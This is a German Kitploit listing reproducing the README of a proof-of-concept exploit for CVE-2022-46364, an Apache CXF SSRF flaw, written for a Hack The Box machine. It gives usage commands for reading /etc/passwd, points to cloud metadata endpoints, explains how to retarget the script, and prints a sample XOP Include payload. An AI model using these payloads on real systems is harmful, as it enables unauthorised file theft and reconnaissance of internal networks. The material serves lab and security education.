Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-46364 — Proof-of-concept-Exploit für CVE-2022-46364, eine Apache-CXF-SSRF-Sicherheitslücke, die das Lesen beliebiger Dateien und das Auskundschaften interner Netzwerke über manipulierte MTOM/XOP-SOAP-Anfragen ermöglicht. | Kitploit
Tools/GitHubGitHub/c0gnit00/cve-2022-46364
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubc0gnit00/cve-2022-46364

CVE-2022-46364

Proof-of-concept-Exploit für CVE-2022-46364, eine Apache-CXF-SSRF-Sicherheitslücke, die das Lesen beliebiger Dateien und das Auskundschaften interner Netzwerke über manipulierte MTOM/XOP-SOAP-Anfragen ermöglicht.

Repository anzeigen
1vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-46364 — Apache CXF MTOM/XOP SSRF (Datei-Lesen)

Proof-of-Concept-Exploit für CVE-2022-46364 — eine Server-Side-Request-Forgery (SSRF)-Sicherheitslücke in Apache CXF bei der Verarbeitung von MTOM/XOP-Anfragen.


Schwachstellenübersicht

CVE-2022-46364 betrifft Apache CXF-Versionen vor 3.4.10 und 3.5.5. Wenn MTOM (Message Transmission Optimization Mechanism) in einem SOAP-Dienst aktiviert ist, validiert der CXF-Unmarshaller das href-Attribut innerhalb von <xop:Include>-Elementen nicht korrekt. Anstatt href auf cid:-URIs zu beschränken (wie von der W3C-XOP-Spezifikation gefordert), dereferenziert CXF beliebige URIs – einschließlich file://, http:// und https://.

Dies ermöglicht es einem nicht authentifizierten Angreifer:

  • Beliebige lokale Dateien zu lesen (file:///etc/passwd)
  • SSRF gegen interne Dienste durchzuführen (http://169.254.169.254/)
  • Potenziell Cloud-Metadaten-Endpunkte oder interne APIs zu erreichen

Ziel

Dieser PoC wurde für die Hack The Box-Maschine geschrieben und getestet:

Ziel-Endpunkt: http://devarea.htb:8080/employeeservice

Durch kleine Änderungen im XML-Payload gemäß dem Ziel-WSDL kann es an die Zielumgebung angepasst werden.


Verwendung

/etc/passwd lesen (Standardziel)

Die Standard-URL ist http://devarea.htb:8080/employeeservice.

root@kitploit:~
python3 CVE-2022-46364.py --file /etc/passwd

Benutzerdefinierte Ziel-URL

root@kitploit:~
python3 CVE-2022-46364.py --url http://target:8080/employeeservice --file /etc/passwd

Ausführlicher Modus – Anfrage und rohe Antwort anzeigen

root@kitploit:~
python3 CVE-2022-46364.py --file /etc/passwd --verbose

Anpassung an andere Ziele

Wichtig: Dieses Skript ist fest für die WSDL-Struktur der HTB DevArea programmiert. Um es gegen einen anderen verwundbaren Apache CXF-Dienst zu verwenden, müssen Sie das SOAP-Payload in build_payload() anpassen, damit es dem WSDL-Vertrag des Ziels entspricht.

Schritte zur Anpassung:

  1. WSDL vom Ziel abrufen:

    root@kitploit:~
    curl http://target:8080/employeeservice?wsdl
    
  2. Dienst-Details identifizieren:

    • targetNamespace (z. B. http://devarea.htb/)
    • Operationsname (z. B. submitReport)
    • Parameterstruktur (z. B. <arg0> mit verschachteltem <content>)
  3. Payload in build_payload() anpassen:

    • Namespace aktualisieren (xmlns:dev="...")
    • Operationsnamen aktualisieren (<dev:submitReport>)
    • Parameter-Wrapper aktualisieren (<arg0>)
    • <xop:Include href="file://{dateipfad}"/> in ein Feld einfügen, das der Server als Anhang verarbeitet
  4. --url beim Ausführen des Skripts aktualisieren.

Beispiel einer WSDL-Anpassung

Angesichts dieses WSDL-Ausschnitts:

root@kitploit:~
<wsdl:definitions targetNamespace="http://example.com/">
  <wsdl:operation name="uploadDocument">
    <wsdl:input message="tns:uploadDocument"/>
  </wsdl:operation>
</wsdl:definitions>

Ihr Payload sollte wie folgt aussehen:

root@kitploit:~
<soapenv:Envelope xmlns:soapenv="..." xmlns:ex="http://example.com/" xmlns:xop="...">
  <soapenv:Body>
    <ex:uploadDocument>
      <document>
        <xop:Include href="file:///etc/passwd"/>
      </document>
    </ex:uploadDocument>
  </soapenv:Body>
</soapenv:Envelope>

Funktionsweise

  1. Das Skript erstellt eine multipart/related HTTP-Anfrage mit Content-Type: application/xop+xml.
  2. Innerhalb des SOAP-Bodys wird ein <xop:Include href="file:///etc/passwd"/>-Element platziert.
  3. Der verwundbare CXF-Server behandelt dies als Anhangsreferenz und dereferenziert die file://-URI.
  4. Die Dateiinhalte werden gelesen, vom Server base64-kodiert und innerhalb des SOAP-<return>-Elements zurückgegeben.
  5. Das Skript extrahiert den base64-String nach Content: und dekodiert ihn.

Referenzen

RessourceLink
Apache CXF AdvisoryCVE-2022-46364
NVD-EintragNVD — CVE-2022-46364
Apache Jira (CXF-8706)CXF-8706
W3C-XOP-SpezifikationXML-binary Optimized Packaging
Penligent Deep DiveCVE-2022-46364 PoC in Practice
HTB DevAreaHack The Box — DevArea

Haftungsausschluss

Dieses Tool ist nur für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Holen Sie stets ausdrückliche Erlaubnis ein, bevor Sie Systeme testen, die Ihnen nicht gehören. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.


Lizenz

MIT-Lizenz – Sie dürfen es unter Angabe der angemessenen Quellenangabe frei verwenden, modifizieren und teilen.

Tool herunterladen